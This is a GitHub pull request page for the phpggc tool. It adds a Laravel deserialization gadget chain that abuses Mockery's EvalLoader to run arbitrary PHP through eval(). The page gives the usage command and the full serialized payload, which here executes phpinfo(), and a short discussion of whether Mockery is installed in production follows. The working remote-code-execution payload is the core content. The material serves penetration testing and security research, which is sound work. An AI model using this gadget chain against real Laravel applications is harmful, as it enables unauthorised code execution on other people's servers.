Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

add laravel rce (until newest version) gadgetchain #61

Merged
merged 1 commit into from Aug 1, 2019

Conversation

@phith0n
Copy link
Contributor

phith0n commented Jul 31, 2019

The gadget chain is for Laravel, test on v5.8.30.

I checked other gadgets, it always needs to be passed in a function like system, passthru, assert, but:

  • After PHP 7, assert is no longer a function, it can't be dynamic execute.
  • On some virtual hosts, command functions may be denied.

Unlike other gadgets, this POC has no restrictions on PHP, just execute arbitrary PHP code through eval().

Usage:

$ php phpggc laravel/rce5 -a 'phpinfo();'
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{S:9:"\00*\00events";O:25:"Illuminate\Bus\Dispatcher":1:{S:16:"\00*\00queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;S:4:"load";}}S:8:"\00*\00event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{S:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{S:9:"\00*\00config";O:35:"Mockery\Generator\MockConfiguration":1:{S:7:"\00*\00name";S:7:"abcdefg";}S:7:"\00*\00code";S:25:"<?php phpinfo(); exit; ?>";}}}
@sajkog

This comment has been minimized.

Copy link

sajkog commented Jul 31, 2019

this chain is for Mockery which is unlikely to be in prod, no?

@phith0n

This comment has been minimized.

Copy link
Contributor Author

phith0n commented Jul 31, 2019

Sure, Mockery is in require-dev field, but dev requirements are installed as the default while using composer install, so I think it is still a useful gadget.

@cfreal

This comment has been minimized.

Copy link
Collaborator

cfreal commented Jul 31, 2019

I guess we can just add this as a note. I'll push this tomorrow. Good job!

@cfreal cfreal merged commit bc7199e into ambionics:master Aug 1, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.